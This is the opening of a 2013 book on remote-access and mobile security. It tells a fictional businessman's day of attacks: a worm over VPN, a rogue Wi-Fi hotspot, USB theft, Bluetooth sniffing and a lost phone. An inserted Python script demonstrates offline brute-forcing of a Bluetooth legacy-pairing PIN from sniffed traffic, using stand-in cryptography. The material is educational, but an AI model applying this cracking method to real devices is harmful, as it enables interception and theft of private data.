Over recent years, the amount of mobile equipment that needs to be connected to corporate networks remotely (smartphones, laptops, etc.) has increased rapidly. Innovative development perspectives and new trends such as BYOD (bring your own device) are exposing business information systems more than ever to a variety of compromising threats. Controlling the security of remote access has become a strategic issue for all companies. This book reviews the threats weighing on these remote access points, as well as the existing standards and specific countermeasures that protect companies, from both the technical and the organizational points of view. It also reminds us that the organization of security is a key element in the implementation of an efficient system of countermeasures. The authors also discuss the novelty of BYOD, its dangers and how to face them.

Contents
1. An Ordinary Day in the Life of Mr. Rowley, or the Dangers of Virtualization and Mobility
2. Threats and Attacks
3. Technological Countermeasures
4. Technological Countermeasures for Remote Access
5. What Should Have Been Done to Make Sure Mr Rowley's Day Really Was Ordinary

About the Authors
Dominique Assing is a senior security consultant and a specialist in the management and security of information systems in the banking and stock market sectors. As a security architect and risk manager, he has made information security his field of expertise.
Stéphane Calé is security manager (CISSP) for a major automobile manufacturer and has more than 15 years of experience in putting in place telecommunications and security infrastructures in an international context.
Page count: 285
Year of publication: 2013
Contents
Introduction
Chapter 1 An Ordinary Day in the Life of Mr. Rowley, or the Dangers of Virtualization and Mobility
1.1. A busy day
1.2. The ups and downs of the day
1.3. What actually happened?
Chapter 2 Threats and Attacks
2.1. Reconnaissance phase
2.2. Identity/authentication attack
2.3. Confidentiality attack
2.4. Availability attack
2.5. Attack on software integrity
2.6. BYOD: mixed-genre threats and attacks
2.7. Interception of GSM/GPRS/EDGE communications
Chapter 3 Technological Countermeasures
3.1. Prevention
3.2. Detection
3.3. Reaction
3.4. Organizing the information system’s security
Chapter 4 Technological Countermeasures for Remote Access
4.1. Remote connection solutions
4.2. Control of remote access
4.3. Architecture of remote access solutions
4.4. Control of conformity of the VPN infrastructure
4.5. Control of network admission
Chapter 5 What Should Have Been Done to Make Sure Mr Rowley’s Day Really Was Ordinary
5.1. The attack at Mr Rowley’s house
5.2. The attack at the airport VIP lounge while on the move
5.3. The attack at the café
5.4. The attack in the airport VIP lounge during Mr Rowley’s return journey
5.5. The loss of a smartphone and access to confidential data
5.6. Summary of the different security solutions that should have been implemented
Conclusion
APPENDICES
Appendix 1: Summary of Security Solutions
Appendix 2: Glossary
Bibliography
Index
First published 2013 in Great Britain and the United States by ISTE Ltd and John Wiley & Sons, Inc.
Apart from any fair dealing for the purposes of research or private study, or criticism or review, as permitted under the Copyright, Designs and Patents Act 1988, this publication may only be reproduced, stored or transmitted, in any form or by any means, with the prior permission in writing of the publishers, or in the case of reprographic reproduction in accordance with the terms and licenses issued by the CLA. Enquiries concerning reproduction outside these terms should be sent to the publishers at the undermentioned address:
ISTE Ltd
27-37 St George’s Road
London SW19 4EU
UK
www.iste.co.uk
John Wiley & Sons, Inc.
111 River Street
Hoboken, NJ 07030
USA
www.wiley.com
© ISTE Ltd 2013
The rights of Dominique Assing and Stéphane Calé to be identified as the author of this work have been asserted by them in accordance with the Copyright, Designs and Patents Act 1988.
Library of Congress Control Number: 2012951550
British Library Cataloguing-in-Publication Data
A CIP record for this book is available from the British Library
ISBN: 978-1-84821-435-4
Printed and bound in Great Britain by CPI Group (UK) Ltd., Croydon, Surrey CR0 4YY
“With the Internet, to be competitive in the market is to communicate information to the outside world. It no longer consists of forbidding access to an organization’s data; it consists of mastering information exchange”.
Jean-Philippe Jouas (president of CLUSIF)
Extract from 01 Informatique, 4 September 1998
Remote access has helped realize one of mankind's most ancient dreams, ubiquity: with these new technologies, employees can now access all of their company's resources anywhere, at any time and from any device (PC, PDA, etc.).
This development of “nomadism” is linked to a number of technological improvements, such as the “democratization” of the cost of laptops and the proliferation of Internet access, which is now available even in the remotest of places. However, it also has its roots in economic factors such as the globalization forcing companies to be more efficient and responsive in order to survive in a highly competitive environment. The gains arising from the implementation of mobility solutions are indeed many and varied:
Unfortunately, the exponential growth of remote access has called into question the security model that companies have relied on until now. As in the Middle Ages, it consists mainly of building high perimeter walls against assailants, and of strictly limiting and controlling what comes in and what is exchanged with the outside. But today, organizations' physical boundaries are becoming more diffuse as the development of telework extends their geographical perimeter as well as the number of entry points. A veritable "Pandora's box" has been opened by the growing use of remote access. Thus, a single employee can inadvertently contaminate the entire information system of their company, for example by connecting from home with a personal computer that was infected while their children were surfing illegal download sites. The evolution of organizations' security policies is therefore vital.
Each security issue is unique, because such issues depend on the organization's intended use for its remote access, as well as on its own specific limitations and constraints (financial, technical, etc.). For this reason, it is not possible for us to provide, as part of this work, a universal "recipe". We will try, however, over the course of the following chapters, to give you some ideas, approaches, principles and techniques that will allow you to understand, on the one hand, the risks involved, and on the other, provide you with the means to build a security solution for your particular case.
Our aim is not to produce an exhaustive description of the various security issues and solutions concerning the mobile elements of companies, because as you will have gathered, such a task would require a much longer book. We have therefore chosen to adopt a didactic approach to make the reader aware of the various threats and protection solutions, by giving a concrete example based on an average user, and the various attacks suffered during a “typical day.”
Then, we place these attacks in the broader context of the different families of risk. This allows us to then present the tools capable of countering these attacks or limiting their effects.
Finally, we return to our average user and explain the protection solutions that should have been put in place to protect him. As the field of security is not solely a matter of technical issues, we conclude by linking the various recommendations to one of the main methodological approaches in this area (ISO/IEC 27002).
“Appearances can be deceiving”
Proverb
The day promised to be busy for Mr. Rowley. Upon awakening that morning, he knew it would be punctuated by unexpected events – as usual – but what they would be he didn’t know.
It all started after breakfast, when, after his son had already been surfing the Web, he decided to get on with preparing his annual report by logging onto his company's fileserver from his personal computer. Thanks to the VPN[1] Internet access solution which had been installed by his company, he could work from home as if he were in the office. What a gain in productivity! And it was so simple: all that he had needed to do was install a small software client on his PC and configure it appropriately.
Then, because his plane took off at 9am and he was worried there might be heavy traffic, Mr. Rowley hurried out of the house – and found himself at the airport more than three quarters of an hour before boarding. It was not a waste of time, though, since with his business class ticket, he had access to the VIP lounge. He took advantage of the opportunity to download his latest emails on his laptop, using the free Wi-Fi[2] access, to deal with them while he was travelling. These little desks for travelers to use were really useful. You could even leave your PC connected and downloading emails, and go to the café to enjoy a coffee and a pastry.
Two hours later, when he had arrived at his destination, Mr. Rowley had dealt with all his emails, and even slept for a little while.
It really was his lucky day. It took barely ten minutes from the airport by taxi to get to his client’s workplace. As it wasn’t the done thing to arrive at an appointment an hour early, he decided to wait in a small café at the foot of the building. This café also offered free Internet access via Wi-Fi, so our man took the opportunity to order, on an e-commerce site, a fashion doll that his daughter wanted for her birthday.
The meeting with his client went as hoped, and Mr. Rowley could finally close the deal on the new V91 model, which he had been working on for several weeks.
Back to the airport, and as he was early again, he made the most of the VIP lounge, and got on with some work. He took the opportunity to transfer the full list of contacts on his laptop to his new smartphone via Bluetooth[3].
Finally, back at home, he was able to celebrate signing the contract with his little family, with a bottle of champagne.
Just before going to sleep, wanting to check his emails using his smartphone, Mr. Rowley made the unpleasant discovery of the disappearance of his precious device. It had slipped from his pocket in the taxi that took him home, without him having noticed. This perfect day ended on a negative note; he would have to replace it as soon as possible, and transfer his contacts from his PC again: a slight waste of time, but he thought no more of it.
Mr. Rowley was happy, because he had finally succeeded in convincing his client to sign the contract that was so important to his business, and which assured more than $50,000 of turnover in the coming months.
But he did not yet know that, on that day:
While nothing in the eyes of Mr. Rowley could distinguish this day from so many others he had experienced in the course of his long business career, invisible and ill-intentioned individuals had made every effort to take advantage of his lack of knowledge of information security.
It all started when his son connected to a website which had previously been compromised by a hacker. Upon visiting the site, a worm[4] was automatically installed on Mr. Rowley's personal computer via a vulnerability in the operating system. The worm then took advantage of the IP tunnel (the VPN) that had been established with the company network to propagate there, significantly disrupting the functioning of the information system.
Then, at the airport, when Mr. Rowley left his PC unattended, an employee of a competitor who had recognized him, piqued by curiosity, decided to glance at his laptop. It was then that he recognized the plan for the launch of the new V91 model. The opportunity to obtain valuable information that might hamper the launch of the new product was too good to miss. All it took was to use a USB key to copy all of the desktop files on Mr. Rowley’s computer, in just a few seconds.
As for the Internet access point used in the café, it had not been provided for customers by the owner, but had been installed by a hacker who knew that by placing a Wi-Fi router in a busy place, many victims could be snared. Those who believed they were connecting to popular websites (eBay, Amazon, etc.) were unknowingly redirected to a server maintained by the attacker, which is easy for whoever operates the access point, since it also controls the DNS answers its clients receive. Taking advantage of this middleman position (see Section 2.2.4, Man in the middle) between the user and the e-commerce site, the attacker profited by collecting confidential information, including payment card details.
When Mr. Rowley synchronized his address book between his smartphone and his laptop, he had to enter a matching PIN[6] on both devices. But a hacker had set up a PC with Bluetooth sniffing software in the VIP lounge, knowing that such a place necessarily attracts people in positions of responsibility, who carry confidential and readily marketable information. By recording the traffic exchanged between the PC and the smartphone, he obtained everything that the pairing and authentication exchange sends in the clear: the random number IN_RAND[5], the two devices' addresses (BD_ADDR[7]) and the authentication challenge and response. The only secret he still lacked, the short PIN, he recovered offline by brute force, recomputing the key derivation for each candidate PIN until it reproduced the response he had observed (see section 2.3.4, Cracking encrypted data). Once the link key had been obtained in this way, it was not difficult to retrieve the desired information from Mr. Rowley's mobile phone. Note that this attack targets the PIN-based "legacy" pairing of Bluetooth versions before 2.1; Secure Simple Pairing, introduced in version 2.1, no longer derives the link key from the PIN alone.
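The following script is an added example, not code from the book, of the offline PIN search described above (the attack published by Shaked and Wool in 2005 against Bluetooth legacy pairing). It simulates the pairing of two devices, keeps only what crosses the air, and then recovers the PIN from that capture alone. Two assumptions are made for the sake of a self-contained example: the two BD_ADDR values and the PIN are constructed, and the real Bluetooth functions E22, E21 and E1, which are built on the SAFER+ block cipher, are replaced by an HMAC-SHA256 stand-in. The shape of the attack is unchanged by that substitution: only the PIN is secret, and its keyspace (10^4 for four digits) is what makes the search trivial.

```python
"""Offline PIN recovery against Bluetooth legacy (pre-2.1) pairing.

A passive sniffer sees, in the clear: IN_RAND, both BD_ADDRs, each side's
LK_RAND masked with K_init, the authentication challenge AU_RAND and the
response SRES. Only the PIN is secret, so the attacker recomputes the whole
chain for each candidate PIN until the recomputed SRES matches the sniffed one.

ASSUMPTION: E22 / E21 / E1 are stand-ins built on HMAC-SHA256; the real
functions use SAFER+. The addresses and PIN below are constructed sample data.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Callable, Optional


def _prf(label: bytes, key: bytes, *parts: bytes) -> bytes:
    """Stand-in keyed function (ASSUMPTION: replaces SAFER+-based primitives)."""
    return hmac.new(key, label + b"".join(parts), hashlib.sha256).digest()[:16]


def e22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Initialisation key K_init = E22(PIN, BD_ADDR, IN_RAND)."""
    return _prf(b"E22", pin, bd_addr, in_rand)


def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the combination (link) key."""
    return _prf(b"E21", lk_rand, bd_addr)


def e1(link_key: bytes, au_rand: bytes, bd_addr: bytes) -> bytes:
    """Authentication response; the real SRES is 32 bits, so keep 4 bytes."""
    return _prf(b"E1", link_key, au_rand, bd_addr)[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Capture:
    """Exactly what a passive sniffer records during pairing + first authentication."""
    addr_a: bytes            # BD_ADDR of the initiator (present in packet headers)
    addr_b: bytes            # BD_ADDR of the responder
    in_rand: bytes           # sent in the clear by A
    lk_rand_a_masked: bytes  # LK_RAND_A xor K_init
    lk_rand_b_masked: bytes  # LK_RAND_B xor K_init
    au_rand: bytes           # authentication challenge
    sres: bytes              # authentication response


def pair_and_authenticate(pin: bytes, addr_a: bytes, addr_b: bytes,
                          rng: Callable[[int], bytes] = os.urandom) -> Capture:
    """Simulate both devices honestly and return only what crosses the air."""
    in_rand = rng(16)
    k_init = e22(pin, addr_b, in_rand)          # both sides derive this from the PIN
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    k_ab = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))  # combination key
    au_rand = rng(16)
    sres = e1(k_ab, au_rand, addr_b)            # B answers A's challenge with K_ab
    return Capture(addr_a, addr_b, in_rand,
                   xor(lk_rand_a, k_init), xor(lk_rand_b, k_init),
                   au_rand, sres)


def crack_pin(cap: Capture, digits: int = 4) -> Optional[str]:
    """Offline search over all numeric PINs of the given length."""
    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}".encode()
        k_init = e22(pin, cap.addr_b, cap.in_rand)
        lk_rand_a = xor(cap.lk_rand_a_masked, k_init)   # unmask with the guess
        lk_rand_b = xor(cap.lk_rand_b_masked, k_init)
        k_ab = xor(e21(lk_rand_a, cap.addr_a), e21(lk_rand_b, cap.addr_b))
        if e1(k_ab, cap.au_rand, cap.addr_b) == cap.sres:
            return pin.decode()                          # guess reproduces SRES
    return None


if __name__ == "__main__":
    # Constructed sample: two made-up addresses and the 4-digit PIN the victim typed.
    laptop, phone = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    capture = pair_and_authenticate(b"7391", laptop, phone)
    print("recovered PIN:", crack_pin(capture))
```

The attacker never interacts with either device: everything after the capture is local computation, which is why a longer PIN is the only lever the user has under legacy pairing, and why the search finishes in well under a second for four digits even in plain Python.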
The bad luck of losing the smartphone in the taxi was the good luck of the next customer, who discovered it, and was even luckier to discover that no protection was in place to prevent access. Mr. Rowley had disabled his passcode protection, deciding that he was wasting too much time repeatedly typing it in.
Mr. Rowley’s misfortunes did not end there. Whoever had got their hands on the smartphone quickly realized the value of his discovery: all the emails, business contacts, meeting notes, tender offers in email attachments, etc. He knew enough people who would be very interested to know all this information – the world of business is sometimes very small!
Unfortunately what happened to our fictional character during this “very ordinary day” is only a small example of the many types of attacks experienced every day by companies which use mobility solutions. In Chapter 2, we present in detail the main types of threats you might encounter, so that you can better understand the scope of potential attacks, and the inventiveness of hackers.
[1] Virtual Private Network: virtual private networks typically run over a public infrastructure such as the Internet, relying on an encryption solution that ensures the confidentiality of data exchanges.
[2] Wi-Fi (often expanded as "Wireless Fidelity"): wireless Ethernet local area network technology, standardized by the IEEE (802.11a, 802.11b, 802.11g, 802.11n).
[3] Wireless communication technology (2.4 GHz) invented in 1994 by the Ericsson company to facilitate the exchange of information between devices over short distances.
[4] A program that spreads from computer to computer by reproducing (duplicating) itself each time, using means as diverse as email, instant messaging, P2P networks, etc.
[5] Random number used when creating the key for pairing Bluetooth devices.
[6] Personal Identification Number: numerical password used on mobile telephones.
[7] Unique 48-bit address which identifies a Bluetooth device.
“Even the most improbable risk is possible”
Gérard Mestrallet (president of GDF-Suez)
It is impossible to list all the attacks with which mobile systems could one day be confronted because there are hundreds, with new ones appearing every week. We have therefore chosen to present the most important, to give you an idea of the techniques and methods that could be used by hackers against you, so that you can assess these threats and put in place appropriate protection measures.
To assist in your understanding, we have classed these threats into five broad categories:
Read on in the full edition.
